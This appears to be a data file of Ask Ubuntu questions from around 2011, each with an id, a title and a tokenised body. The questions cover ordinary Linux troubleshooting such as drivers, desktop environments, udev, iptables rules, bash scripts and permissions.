82412	find out cause of kernel panics	i 've been getting these kernel panics for a while now and been looking for help . i 've tried turning of acpi and such . i 've just installed newest version of ubuntu server 11.10 and does n't seem to go away with kernel 3.0 . i 've done a deep memtest and everything is fine . i scanned my hard drives with manufacture software and no errors . the hardware seems to be ok. a bit ago i ran damn small linux off a usb and did n't notice it crash . i 'm thinking to downgrade to kernel 2.4 and see if it works , but do n't really want to do that . there is a screenshot of what i could get of the kernel panic dump on screen . the kernel.log , dmesg , syslog do n't seem to show any evidence about this kernel panic . i am grateful for any help given ! thank you ! kernel panic screenshot link processor : 0 vendor_id : centaurhauls cpu family : 6 model : 10 model name : via esther processor 1500mhz stepping : 9 cpu mhz : 1496.388 cache size : 128 kb fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge cmov pat clflush acpi mmx fxsr sse sse2 tm nx up pni rng rng_en ace ace_en ace2 ace2_en phe phe_en pmm pmm_en bogomips : 2992.77 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 32 bits virtual power management :
82420	mac g4 with no os : can ubuntu be used ?	i was given a mac g4 without the operating system . it had mac os 10.4 . is there an ubuntu version i can use for the mac like there is for my pc ? if so , what version ? and are there any special tricks for mac ? or is it fairly simple as it is for pc . ( i 'm not at all familiar with mac , but the components look pretty much the same . )
82423	compiz does n't work after trying to enable the desktop cube	i installed ubuntu 11.10 desktop on my acer aspire 5742zg laptop , so i tried to follow the steps of this video to install compiz ( http : //www.youtube.com/watch ? v=yjtp8bgjn_a ) . then i tried to use it but it does n't work ! before installing ubuntu 11.10 i had ubuntu 10.04 lts and it worked on it .
82426	evolution randomly stopped supporting my gmail account	i 'm running 11.04 and have had evolution linked to my gmail for some time without a problem . all of the sudden ( after no changes ) it 's not showing any of my folders or messages . what happened and how can i fix it ?
82433	ca n't boot after compiling 3.1 kernel , can only get to terminal	long story short : i tried compiling kernel 3.1 on ubuntu 11.10 at the same time i had an update waiting for a reboot . computer would boot to a black screen and would hang there . ended up installing 11.10 on top of old install with a live cd . now i had a purple screen on bootup but it would end up booting . realized grub was the problem and tried some stuff but nothing worked . i ended up trying to install propriety ati video drivers and since that nothing has worked , no grub menu ( purple screen ) and when it boots into the kernel it ends up hanging , i can sometimes get a terminal up with alt-fx . i have tried removing the ati drivers with the ati script , purging my fglrx driver , reconfiguring my xconf.org and following any tutorial i can find about fixing a broken graphics driver , but to no avail . i 've gotten to a point were it seems that the ati propriety drivers are correctly loaded but it still has no grub boot menu and wo n't boot into ubuntu . i 've chased down my logs and this line is from kern.log : unity-greeter [ 3269 ] : segfault at 0 ip b7245cbbsp bf9d3900 error 4 in libgio-2.0.so.0.3000.0 [ b71ad000+142000 ] that line leads me to believe i don't have the correct libgio-2 librairy on my system but have no idea how to find out what package has the correct version ... my xorg.conf has no errors and seems to imply the fglrxdrm module got loaded correctly . would be a bit complicated pasting the whole file here but if it would help i 'll post it . lastly , running fglrxinfo give me : error : unable yo open display ( null ) any help or link to another tutorial would be appreciated . thanks .
82434	how do i customise my plymouth theme ?	i want to update my splash screen ( when i boot or logoff ) , logo etc ... to use the solar theme . i did : sudo apt-get install plymouth-theme-solar then i went to the themes folder to customize it : /lib/plymouth/themes/ and i updated logos and other images . sudo update-initramfs -u i think this command is the right one to run but when i run it , nothing is updated what am i missing ?
82437	is there animation software available ?	is there commercial-grade computer animation software available for ubuntu , similar to the professional software sold for the windows operating system ? this question goes out to those of you who may be using such software professionally . my daughter recently graduated from the art institute of seattle , and needs to put together an animation portfolio in order to interest employers in the field . as you know , such software is usually provided by the employer and the costs are high - several thousand dollars . i suggested that she investigate ubuntu as a possible way to acquire the tools she needs . but , since i have no idea what might be available , either as open source or proprietary animation software , i am reaching out to the ubuntu community for help in the hope someone who is using such software can help her . thank you for reading this post , and for any information you might have .
82439	i lose the image when start installation of ubuntu 11.10	did not have this problem in version 11.04 , i had in version 9.10. when it starts to load the image of ubuntu 11.10 the screen make a flash and then shows a number of very fine continuous stripes that occupy the entire screen . the system still works but i can not see anything . i think it has to do with the resolution when it change when it starts booting . somebody can help . i have a dell inspiron 1501. processor sempron 1.7 and 2gb ram .
82442	how do i ensure my apple bluetooth keyboard connects on boot ?	i am using ubuntu 10.04 on a laptop and have an apple bluetooth keyboard which pairs fine . every time i turn my computer off and back on again my keyboard stops working . i have to use the keyboard on my laptop to log in . once i 've logged in , in order to get the wireless keyboard to work , i need disconnect and reconnect it by : clicking on the bluetooth icon , select apple wireless keyboard from the drop down menu , then click on disconnect . clicking on the bluetooth icon , select apple wireless keyboard from the drop down menu , then click on connect . looking through syslog , to see what 's happening during boot , i find : nov 25 10:29:21 sony kernel : [ 24.525372 ] apple 0005:05ac:0239.0002 : parse failed nov 25 10:29:21 sony kernel : [ 24.525379 ] apple : probe of 0005:05ac:0239.0002 failed with error -14 and then later in syslog , once i 've disconnected then connected the keyboard , i find : nov 25 10:30:14 sony bluetoothd [ 1247 ] : link_key_request ( sba=00:21:4f:49:8a : db , dba=e8:06:88:5a : e0 : d4 ) nov 25 10:30:14 sony kernel : [ 79.427277 ] input : apple wireless keyboard as /devices/pci0000:00/0000:00:1d.2/usb8/8-1/8-1:1.0/bluetooth/hci0/hci0:12/input11 nov 25 10:30:14 sony kernel : [ 79.427611 ] apple 0005:05ac:0239.0003 : input , hidraw1 : bluetooth hid v0.50 keyboard [ apple wireless keyboard ] on 00:21:4f:49:8a : db i ca n't find anything helpful when googling `` apple : probe of failed with error -14 '' .
82444	dconf editor ca n't make changes to unity panel/launcher	i 've been trying to add stuff to the panel and to change the order of the icons in the launcher but there 's no effect . it 's like the changes are n't saved . i change something , close dconf editor , lock out and back in again and nothing changed .
82445	ubuntu 11.10 64 bit and 32 bit on two drives	i recently acquired a 64 bit machine which works well ( amd 64 3800+ ) . i had an old dell p4 machine which i had configured to dual-boot 11.10 32-bit and win xp sp3 . i wish to install the disk from my old machine into the 64 bit machine and keep everything as is on it to run along with the 64 bit 11.10 installation . can i use the install disk to set up grub to multi-boot the other disk ( e.g . win xp and 11.10 32 bit in addition to 11.10 64 bit ) ? or , will i have to manually set this configuration up with the 64 bit loader ?
82453	how do i set a default window size through compiz ( ccsm ) ?	i am on 11.10 . i feel a bit stupid , but i can not find it . how do i set a default size of a window ? there must be something in ccsm . i would for example like if gnome-terminal were always 1000 pixels high . this is how my windows rules plugin looks like - no size rules :
82457	why was rhythmbox replaced with banshee ?	what was the reason for this replacement ?
82458	can i get the workspace popup to come up before i move to another workspace ?	can i set ubuntu 11.10 to bring up the workspaces by pressing control-alt only instead of control-alt and an arrow . i would like to see what 's in the workspaces before moving to a new workspace .
82460	my installation usb jumps straight to the desktop and wo n't allow me to install	when i try to upgrade my 10.04 system to 11.10 with my live usb it jumps straight to the desktop and when i click on the `` install 11.10 '' icon nothing happens . i 've used the usb on other systems before so i 'm guessing it 's ok .
82461	how do i get tv out working on an ati x800 gtoâ˛ ?	is there any way to make my graphics card ( ati x800 ) work with tvout ? i know there are no proprietary drivers for this card only the opensource ones . it uses this cable for video out : http : //warningdang.dynalias.com/magento/media/catalog/product/cache/1/image/265x265/9df78eab33525d08d6e5fb8d27136e95/a/3/a31b_1.jpg personally i use the yellow rca for tvout ( in windows ) . i hope there is a way to work it out because it 's a really important feature for me and one of the only reasons i boot windows . thanks ahead !
82470	what is the correct way to restart udev ?	i 've changed the name of my eth1 interface to eth0 . how to ask udev now to re-read the config ? service udev restart and udevadm control -- reload-rules do n't help . so is there any valid way except of rebooting ? ( yes , reboot helps with this issue ) yes , i know i should prepend the commands with sudo , but either one i posted above changes nothing in ifconfig -a output : i still see eth1 , not eth0 . i just changed the name property of udev-rule line . do n't know any reason for this to be ineffective . there is no any error in executing of both commands i 've posted above , but they just do n't change actual interface name in ifconfig -a output . if i perform reboot - then interface name changes as expected . for development purposes i write some script that clones virtual machines ( virtualbox-driven ) and pre-sets them up in some way . so i perform a command to clone vm , start it and as long as network interface mac is changed - udev adds the second rule to network persistent rules . right after machine is booted for the first time there are 2 rules : eth0 , which does not exist , as long as it existed in the original vm image mac eth1 , which exists , but all the configuration in all files refers to eth0 , so it is not that good for me so i with sed delete the line with eth0 ( it is obsolete and useless in cloned image ) and replace eth1 with eth0 . so currently i have valid persistent rule , but there is still eth1 in /dev . the issue : i do n't want to reboot the machine ( it will take another time , which is not good thing on building-vm-stage ) and just want to have my /dev rebuilt with some command so i have ready-to-use vm without any reboots .
82473	unity does n't autostart on second x screen	i have two nvidia cards both with 2 heads and both configured as twinview , so i have screen0 and screen1 in my xorg.conf . ccsm sees both screens ( displays them in the screens drop-down at the top left ) , but unity starts only on screen0 by default . the displays on screen1 only show the default white screen and default x mouse cursor , when i hover over them . is this the normal , expected behavior ? can i start unity on screen1 automatically without running custom shell scripts ( like display=:0.1 compiz -- replace ) ?
82477	how do i reset password in ubuntu 11.10	i am new to ubuntu and am encountering problems downloading updates as i do n't know or have a password to authenticate . i dropped to root shell during boot up , then used the password command , entered the new password twice and then received the message `` authentication manipulation error '' .
82480	how to see all computers connected to a network	i am in a lan and there are 3 ubuntu , 2 kubuntu , 2 windows xp and 2 windows 7 . what commands or tools are available to see what pcs are connected to the lan that it shows the name of the pc and the ip . similar to tools like angry ip that show all pcs in a lan . note that i do not know the ips or names of the computers connected to the lan . so the tool or command should look for them to .
82483	nvidia-current as default graphic driver	i 'm just recently used ubuntu 11.10 for a change . i 've install it on a dual-boot with windows 7 - but eventually going to remove windows . i 'm using a asus k42jc having an nvidia geforce 310m chip . after installing ubuntu and following some steps on how to install nvidia on my laptop using the codes below , i ca n't still get my nvidia driver display on the system info as the graphics driver . sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current i wanted to have this setting for me to install blender , warcraft iii , etc . how can i resolve the matter ? thanks in advance .
82487	i ca n't find any program i download	i am new to ubuntu and i am using version 10.04 . i download frostwire with firefox and installed it , but i can not find where the program is anywhere .
82492	backup in ubuntu , upgrade and restore	i am using ubuntu 11.04 ( natty ) as a wubi installation in my laptop . i.e inside windows , in a drive . now i need to move to another laptop . i found instructions for the backing up in https : //help.ubuntu.com/community/backupyoursystem now as a rule , i would be getting a new laptop with windows again i need to use wubi . so in my new system i want to try 11.10 instead of 11.04 if i create a backup of 11.04 and in my new laptop if i upgrade to 11.10 , can i restore it back in 11.10 ?
82494	moving data to /var/lib/tftpboot not possible : device or resource busy	i need to move data to /var/lib/tftpboot . i 'm getting the error device or resource busy . i killed the tftp daemon which uses this directory , and ran lsof +d /var | grep tftp which gave no output . but i still ca n't copy my files . any ideas ? i tried already with sudo . the output of sudo strace touch /var/lib/tftpboot/test can be seen here .
82497	how to install a tar.bz2 package	how can i install a tarbz2 package . example : i have downloaded firefox 8 tar.bz2 . i want to know a general method for installation of tar.bz2 package .
82502	how to move files leaving symlinks behind ?	how can i move/copy files from one directory to another , leaving the symlinks in the original directory . i know the ln -screates symlinks in the destination , but i want to leave the symlinks in the source directory and move the actual files to a new one . how can i do this ?
82505	what happened to my files ?	after a successful upgrade from 11.04 to 11.10 a gradual deterioration occurred -- my laptop became unstable with updates -- i corrected the aspell file , only to have another appear , i sought but i was blocked out . had an idea , but resolved one that another problem appeared -- going from bad to worse -- i re-installed windows vista and ubuntu 11.10 in the original partitions . window called it windows old and i had no problems recovering my files there - ubuntu decided it is going to make a new home directory -- . the questions is where did these files go to after re-installation -- are they deleted ? if so that 's fine duplicates are in ubuntu 1 by synchronization - i can only download one file at a time !
82509	`` failed to download repository information '' error , what to do ?	well , some sources of softwares are n't working ; mostly all the universe and multiverse sources ' applications are not installable ... shortly the problem has shown in the picture in the link below . please help !
82510	gcc no longer works after upgrade	as an example : hsmyers @ ubuntu : ~/c_dev $ cat hello.c # include < stdio.h > int main ( int argc , char **argv ) { printf ( `` hello world ! \n '' ) ; return 0 ; } hsmyers @ ubuntu : ~/c_dev $ gcc -c -o hello.o hello.c in file included from /usr/include/stdio.h:28:0 , from hello.c:1 : /usr/include/features.h:323:26 : fatal error : bits/predefs.h : no such file or directory compilation terminated . at a guess somewhere along the way after trying to fix the error message : /usr/bin/ld : can not find crt1.o : no such file or directory i 've munged things up completely . could anyone please advise ?
82512	why wo n't my thunderbird mail access my yahoo mail ?	i always get `` configuration could not be verified '' regardless of how many times i try to configure my t- i have had computer software professionals try with no success .
82514	problem installing libva ( vaapi ) , vainfo fails	i 'm following a wiki on how to make vlc use the gpu in the core i3 integrated graphics chipset , but i 'm stuck at one of the first steps , installing vaapi . i installed libva1 and vainfo by using `` sudo apt-get install libva1 vainfo '' , but when i run vainfo it says libva : libva version 0.32.0 libva : va_getdrivername ( ) returns 0 libva : trying to open /usr/lib/dri/i965_drv_video.so libva : va_opendriver ( ) returns -1 vainitialize failed with error code -1 ( unknown libva error ) , exit it should say vaprofileh264high : vaentrypointvld vaprofilevc1advanced : vaentrypointvld according to the wiki . /usr/lib/dri/i965_drv_video.so does n't exist in my system , but i installed libva1 with apt-get .
82517	sensitive middle-button ( mouse )	whenever i click on the middle-button on my mouse-wheel , it seems that multiple click events are being sent in succession . case in point : when i middle-click a bookmark folder in chrome ( to open up all the bookmarks in tabs ) , chrome opens up the same set of bookmarks three times . this is very annoying . is there a way in x or gnome to detune the sensitivity of my mouse 's middle button to prevent multiple click events from being sent ? maybe like a double-click speed adjustment for the middle-button ?
82523	how do i customise desktop effects and toggle between comopsiting window mangers in kde on ubuntu 10.10 ?	how do i customise the desktop effects in kde like aero snap , aero peek and much more ? i know that these effects are enabled by the compositing window manager for kde which is kwin . but what if i want to use compiz ? how do i toggle between compiz and kwin in ubuntu 10.10 ? does the fusion icon still work , or should i use displex ?
82524	unable to install anything that depends upon spamassassin . cant even install spamassasin	i am trying to install mailscanner using apt-get install mailscanner and i got the following error setting up spamassassin ( 3.3.1-1 ) ... starting spamassassin mail filter daemon : child process [ 21344 ] exited or timed out without signaling production of a pid file : exit 255 at /usr/sbin/spamd line 2588. invoke-rc.d : initscript spamassassin , action `` start '' failed . dpkg : error processing spamassassin ( -- configure ) : subprocess installed post-installation script returned error exit status 255 dpkg : dependency problems prevent configuration of mailscanner : mailscanner depends on spamassassin ( > = 3.1 ) ; however : package spamassassin is not configured yet . dpkg : error processing mailscanner ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : spamassassin mailscanner e : sub-process /usr/bin/dpkg returned an error code ( 1 ) and when i tried to install spamassassin i got the following error : setting up spamassassin ( 3.3.1-1 ) ... starting spamassassin mail filter daemon : child process [ 21389 ] exited or timed out without signaling production of a pid file : exit 255 at /usr/sbin/spamd line 2588. invoke-rc.d : initscript spamassassin , action `` start '' failed . dpkg : error processing spamassassin ( -- configure ) : subprocess installed post-installation script returned error exit status 255 dpkg : dependency problems prevent configuration of mailscanner : mailscanner depends on spamassassin ( > = 3.1 ) ; however : package spamassassin is not configured yet . dpkg : error processing mailscanner ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : spamassassin mailscanner e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i am using ubuntu server 10.04
82527	getting gnome shell back	after experimenting with other desktops and removing the latest ( xfce4 ) i no longer have either of the unity options or the gnome option in my login screen . i have two cairo dock options , which run unity normally , and i have the gnome classic options . i have reinstalled gnome shell successfully , yet it fails to appear at login , therefore rendering it unusable . how do i fix this ?
82528	disable suspend when pressing fn+f4	i have a system 76 laptop with oneiric . i just tried to turn the volume down using fn+f5 but i accidentally pressed fn+f4 and suspended the system instead . is there a way to disable that so i wo n't make the mistake again ?
82531	where is the transmission-daemon torrent list stored ?	i do n't remember sleepwalking , but this morning i found transmission-daemon uninstalled . i 've reinstalled it , but when i open it up through the web interface or transgui , there are no torrents listed . i assume i 've lost them , but just in case , where is this data supposed to be stored ?
82532	monitor not detected - low resolution only	i just installed ubuntu 11.1 on my desktop pc . it was a clean install , no upgrading . i have a samsung syncmaster bx2450 connected to the pc . my problem is that i can not make ubuntu recognize my monitor - which is capable of more than 1024 . i ran a shut down of lightdm , and ran sudo x -configure , but it gave me a `` configuration failed '' . nothing seems to work - any ideas ? vesa : gf119 board - 13100000 xx @ xxx : ~ $ lspci -nn |grep vga 02:00.0 vga compatible controller [ 0300 ] : nvidia corporation gt520 [ geforce gt520 ] [ 10de:1040 ] ( rev a1 ) xx @ xxx : ~ $ xrandr -q xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 61.0* 800x600 61.0 640x480 60.0 i downloaded the driver directly , installed it according to michael k 's answer . but i am back to square one - the screen gets to the purple start color - and locks . any suggestions as what to do now ? i would very much like to use 1920 x 1200
82533	iptables-restore failing to load my rules	i 've been searching around for some time now , but nothing solves my problem . i 'm setting up a mail server , but when writing to the iptables , i get an error : iptables-restore : line 2 failed . i 'm trying to use the following /etc/iptables.test.rules : # allows smtp access -a input -p tcp -- dport 25 -j accept # allows pop and pops connections -a input -p tcp -- dport 110 -j accept -a input -p tcp -- dport 995 -j accept # allows imap and imaps connections -a input -p tcp -- dport 143 -j accept -a input -p tcp -- dport 993 -j accept after this , i 'm issuing the following command : sudo iptables-restore < /etc/iptables.test.rules however i get returned this : iptables-restore : line 2 failed . i do n't know what the problem is . can anyone clarify ? i 'm using ubuntu 10.10 lts
82534	sofware upgrades fails to update in 11.10	i have a huge list of software upgrade after installing 11.10 via a alternate cd . when i initiated the process , i get so many packages in failed state and only few get downloaded successfully
82536	application menu disappeared from several applications . how to get it back	application menus did disappear . not all applications . applications affected are for example : gedit , gimp , software center , empathy applications not affected : synaptic , clementine , libre office . screenshot : using gnome shell , ubuntu 11.10. how can i get it back ? thanks .
82538	is my encrypted home folder open to other users when i am logged in ?	i am a bit unsure about how ubuntus encrypted home folder works compared to a truecrypt partition ( which is what i have used before ) . when i am logged in , will other users on my computer be able to access the files in my encrypted home folder ?
82542	why can any user read the content in my home directory ?	why is it that the default setting makes it possible for user a to look in the home of user b and vice versa ? and furthermore ... that user can not only look into the home of another user , he can also open any document he wants to . it feels very insecure to me . there should be more privacy for users . i know how to prevent this situation , but it puzzles me why this should be possible in the first place .
82546	install updates without breaking shell theme ?	recently i installed a copy of oneiric ocelot 11.10 on my thinkpad . everything went fine , i installed the gnome shell and gnome-tweak-tool to customize everything . i changed the shell theme , the gtk+ theme and the icon set . after everything fit my needs perfectly , i installed some updates from the update manager ( no upgrades , just small updates ) . i had to restart , and after i restarted , my gnome shell was broken . in tweak-tool , it showed the customized shell as the default one , and my gtk theme was broken as well ( it looked like two themes `` frankensteined '' together ... ) . the bad thing was - i could n't get things back into the default settings ! so the only thing left was to use the -non broken- unity shell . what can i do to stop these things from happening ? ( i mean ... sure i could avoid the updates , but that would be kind of stupid , too . ) i only have these ppas installed : ferramroberto-gnome3-oneiric.list ( and .save ) , playonlinux.list ( and .save ) and how can i fix the broken gnome-shell ?
82550	how can directory deep be set in dash for searching ?	when i would like to open one of my files used dash search , i can search only my first-level directories in my home . what can i set that i find anything in the deeper directories ?
82557	grub takes minutes to load	after bios , grub 's background image is shown . then i 'll have to wait more than a minute for grub 's boot menu to appear . after the menu is shown , everything behaves normally . i 'm running oneiric . anything wrong with my config file or any other ideas ?
82561	jpgs downloaded from facebook unrecognizable to shotwell	for some reason , shotwell is unable to import or view jpg files downloaded from facebook . ( i doubt that facebook has much to do with the issue - just mentioning my specifics here ) . i hit the download link under a photo on facebook , choose to save the file , then once it has downloaded i move it from my downloads folder to my pictures folder . i double check that the name ends in .jpg - yet when i search for the file using import from folder in shotwell , its name is watermarked , and therefore can not be selected or imported . any thoughts ?
82562	is ubuntu optimized for multicore cpus ?	does ubuntu make use of multicore cpus ( as windows 7 is said to do ) ? in other words , is it multitasking optimized so that users will take benefit of 4+ core processors ?
82567	can i download unity as a separate session on ubuntu 10.10 without breaking compiz 0.8.6 ?	i installed ubuntu 10.10 desktop edition , which uses the gnome 2 desktop environment with the gnome classic shell . it comes with compiz 0.8.6 pre-installed , so i can install and configure the bleeding-edge version of compiz through git . after i moved from ubuntu 11.10 to 10.10 , i really enjoyed the gnome classic session with cairo-dock and compiz , but i still miss the simplicity of unity . however , one of the dependencies of unity is compiz 0.9.6 ( i am also aware that i can download unity netbook edition , but it would be not practical installing it on a laptop ) . this means if i want to use unity 4.22.0 , i need to update compiz , which i do not want to do because i want to use the unsupported compiz plugins which only work on compiz 0.8.6 . is there a way around this ? can i download unity as a separate session without breaking compiz 0.8.6 ?
82574	how can i reflect the screen when using the nvidia proprietary driver ?	the nouveau/opensource work fine with xrandr screen reflection ( mirror image ) ala xrandr -- output hdmi -- reflect x or ( when using then closed source drivers ) xrandr -x however the hdmi audio output is somewhat broken at the moment . the closed source nvidia/290 work fine with the hdmi audio out and screen rotation , but i cant seem to find any clues on how to reflect the screen . does anybody have any experience or tips to get the screen reflection working with the closed source drivers ?
82576	ironhide / bumblebee with a virtualbox vm . will it pass through video acceleration to the physical card ?	any ideas whether you can run a windows vm via ironhide for graphics card acceleration ? i 'd like to play games / watch bluray etc utilising my video card .
82579	how can i make nautilus-gsku work in 11.10 ?	i have installed nautilus-gksu on 11.10 , but it is n't working . how can i make the `` open as administrator '' option appear in the context menu ?
82581	desktop background wo n't change until restart	i 'm new to ubuntu and indeed linux systems . i have 11.04 installed on my laptop . here 's the problem . when i select a picture for the desktop background , it says that desktop background has been changed but the changes do not apply right away . it is only after i have restarted the system that the changes will appear . this did not happen before . when i first started using this os a few months ago the changes applied immediately . so what have i done that made this start acting wonky . thank you for any help .
82583	unable to connect to wireless adhoc/hotspot with ubuntu 11.10	i have the following wireless adaptor intel corporation centrino ultimate-n 6300 ( rev 35 ) ever since i installed ubuntu 11.10 , i am unable to connect to an ad-hoc network . i assume it is not getting the ip address . anybody with the same wireless adaptor facing this issue on ubuntu 11.10 ( shell ) ? this used to work perfectly in ubuntu 11.04 .
82584	prevent gnome-shell 's dash from listing recent items	i am using gnome-shell in ubuntu 11.10 . i am getting annoyed when dash search lists recent items . i have tried many ways to prevent it like deleting activity.sqlite and activity.sqlite-journal files under ~/.local/share/zeitgeist adding all the possible entries in activity log manager to prevent application logging specifying time range in activity log manager to forget my activities . but none of the methods are working . the recent items list is still populated . is there any way to tell dash not to list recent items while searching , other than the above methods ? or is there any way to delete the recent items list ?
82586	gateway m-1625 laptop keeps shutting down	i have a gateway m-1625 laptop . the specs are : 3gig ddr2 ram , amd turino*2 processor 2ghz , 250gig hd , windows 7 ultimate . after installing ubuntu 11.10 and using it for about an hour my laptop starts shutting down most times before even reaching the log on screen . i have re installed it twice but the problem still persist . i had this same problem with ubuntu 11.04 . i have been using ubuntu for the last 5 years and never had this problem before . windows 7 , vista and fedora runs fine , it just ubuntu that gives any sort of issue . what could be causing this problem ? has something critical been changed since the 10.10 version ? i really love ubuntu and i want to be able to run it again
82587	subfolders not syncing in ubuntu one	i 've set a folder to sync , which has two subfolders , each of which has many subfolders as well . the main directory ( the one i 've set to sync ) has synced onto my other computer but is devoid of its contents . i 've never had this problem before .
82590	why do n't qt4 apps in lubuntu pick up the gtk theme ?	i 've installed lubuntu and replaced the default players with clementine for audio and vlc for video . the problem i have is that neither pick up the gtk theme , the way they usually do in gnome/xfce . instead they use some pretty ugly and totally off theme . to be clear , both are qt4 applications and should pickup the theme by default . how can i fix this ?
82593	etps/ '' elantech touchpad fails detecting single finger	i have a new laptop with an `` etps/2 elantech touchpad '' . a single finger is only detected , if it is held in such a way that a big area touches the pad . if one touches the pad only with the fingertip , it wil not be detected , both for clicking and for moving the pointer . strangley , two-finger gestures are detected even if the pad is only touched with the fingertips . on ubuntuusers.de i found that elantech touchpads require to reload the psmouse-module by : sudo modprobe -r psmouse sudo modprobe psmouse proto=imps if i do this , one finger finally gets detected as it should , but all two or more finger gestures stop working . also grep -b 5 mouse /proc/bus/input/devices tells that the touchpad now is identified as a mouse , while before the changes it was identified correctly as etps/2 elantech touchpad .
82601	see my desktop on two monitors lubuntu	ok i have an ascer aspire with a amd radeon hd 6320 , when i try to connect a crt monitor in to it i can see the same desktop in the 2 monitors . i want to see in the 2 monitors se same desktop as a continue no 2 identic desktops . i want to extend my desktop to monitor 2 can some body tell me how to do this ? .
82603	how to remove negative view ? ( winkey + m not working )	i just presses winkey + m to see the change and now unable to revert to normal view as the same is not working , dunno why ! ! i installed ccsm as suggested by my pal but unable to figure out how to remove the negative view . some urgent help required . i 'm using ubuntu 10.04 .
82604	how to play live microphone sound over speakers ?	is there a way i could enable live playback from microphone ? it could use at karaoke or as a guitar amplifier .
82605	how to play music in terminal ?	i want a command line to play a specific music file in terminal ( or script ) from my hard-disk . it would be better to do it without installing extra packages .
82609	ca n't change account in ubuntu one control center	my ubuntu one control center on my computer uses one account . my ubuntu one app on my android phone uses a different one . i want to change my account on my computer to the one that my phone uses but i ca n't figure out how .
82612	how to stop executing bash script when there are errors ? ( if problem )	i build my application using maven . in my script after i build the app i startup application server . the problem is that if build is not succesfull the application server is started any way . if i execute ( with bad version that does not compile ) mvn compile echo `` $ ? '' if [ $ ? ! = 0 ] ; then echo `` is not 0 '' else echo `` is 0 '' fi the output is 1 is 0 how to make the if return is not 0 ?
82616	how to execute command every 10 seconds ( without cron ) ?	when i execute cron i get this fault cron : ca n't open or create /var/run/crond.pid : permission denied so , how to do it without cron ? p.s . i want to check if file in svn has changed and i have a special script for it .
82620	bios clock reset on every boot.. hardware or software failure ?	i am running crunchbang ( # ! ) linux on my netbook ( which uses an ubuntu core ) . when i start my netbook ( running on battery ) i am prompted to reset my bios settings . this causes some problems with my clock , since it is reset to factory default settings . which in turn causes problems with fsck and my os does n't boot properly on normal mode . what i did so far was loading the os in recovery mode , letting fsck fix some timestamps in manual mode and eventually it will let me through to the os . logged in i updated my clock and i do n't get other errors . the strange thing is that if my laptop is plugged into ac ( not using the battery ) and i in a previous session had updated the clock and all , it would n't prompt me to reset the bios settings . but as soon as i boot it from battery it prompts me again . which could mean it is a hardware problem . some capacitors leaking power . but it is only on start up , i do n't have strange drift rates or jumps in my clock after i updated it manually with a server . i am unsure what causes my problem , whether it might be simply a hardware failure or due to some bug in my os . has anyone experienced the same problem ?
82621	how to make error message ?	when i execute bash script in eclipse the error output is written in red text . i have some behaviour in my code that is letting `` user '' know that error has occurred , how to make in error look like error ?
82624	thinkpad fingerprint scan only at login	i know how to set up the fingerprint reader for my thinkpad x220 in ubuntu 11.10 . my question is : is it possible to only use the fingerprint reader at the lightdm-login and not when typing `` sudo ... '' in the terminal or starting an application that needs superuser rights ?
82627	hp pavilion dv5 boots with low brightness and graphics card not recognized	my problem is with ubuntu 11.10 in my notebook hp pavilion dv5 with a graphic intel ( r ) hd graphics . when i start ubuntu my screen is without brightness , i can increase it with my control buttons , but when i restart i do n't have brightness again . also ubuntu does n't recognize my graphic card ( intel hd ( r ) graphics ) , please i need your help because i like ubuntu and i would like have it in my laptop ( hp dv5 2045la ) ( 3gb ram ) ( 500 gb disk ) . ps : i installed the repository mesa and now recognizes my card but my problem with the brightness
82628	how to make a directory with permanent permissions different from default	i have system-wide default permissions set with umask 027 . i am in the need to make a directory whose sub-directories would need 775 permission and whose files would need 664 permissions and make these permissions permanent after booting the system . i am looking for the best options out there without compromising security . any ideas ? let me explain the situation : i have a default permission of 027 ( system-wide ) and i want apache2 to write to a directory ( it 's directory ) that should be 022 in order for other user ( let 's say ... another daemon such as flash media server to stream a video ) to access and run it . 多any good ideas ? ( fms should be able to run videos from new directories made by apache2 ) . thank you . some research done : sudo chfn -o `` umask=002 '' daemon_username bash script running at boot with umask 022 on the desired directory add in /etc/fstab ( take special care with line 2 related to bind ) [ tested and not working ] : ip_nfs_volume : /nfs_mount /local_tempmount nfs tcp , nolock , intr , rsize=8192 , wsize=8192 /local_tempmount /desired_mount none bind , dmask=0002 , fmask=0002 p.s . i am looking for a console command , a script ( even a periodic command run from cron ) , but something run without x11 .
82631	what is the way to submit a patch to fix all the damage that lp : # 600941 causes ?	what is the best way to submit a patch to fix all the damage that lp : # 600941 causes ? i ask because lp : # 600941 was put into every version of ubuntu still supported at this time . should i pick a particular version and run ubuntu-bug on it ? should that version be the lts or oneiric or precise ( how can i get precise if i need it ? ) the story is that after it was pushed out all of our systems started experiencing nagios nrpe restart failures . commands like /etc/init.d/nagios-nrpe-server restart would cause nrpe to stop but not restart . i tracked this down to the way that the /etc/init.d/nagios-nrpe-server script is calling start-stop-daemon . the issue is that the `` stop '' stanza in the /etc/init.d/nagios-nrpe-server script first calls start-stop-daemon which sends sigterm to nrpe and then waits only for one second . if nrpe has not exited by that time the pid file will still exist and the /etc/init.d/nagios-nrpe-server script will remove it . worse if /etc/init.d/nagios-nrpe-server restart is used not only will the pid file be removed , the attempt to restart nrpe will fail provided that the nrpe daemon is still tardy in shutting down . the attempt to start under those circumstances will fail because nrpe will still be bound to a socket and the second attempt at binding will cause the nrpe startup to abort . they should have wondered why there was a comment about `` sometimes the pid file does not get removed '' . they should have tested on systems that have a heavy load and therefore slow nrpe response times . the fix is to add -- retry 10 or such to the invocation of start-stop-daemon ... -- stop ... thanks
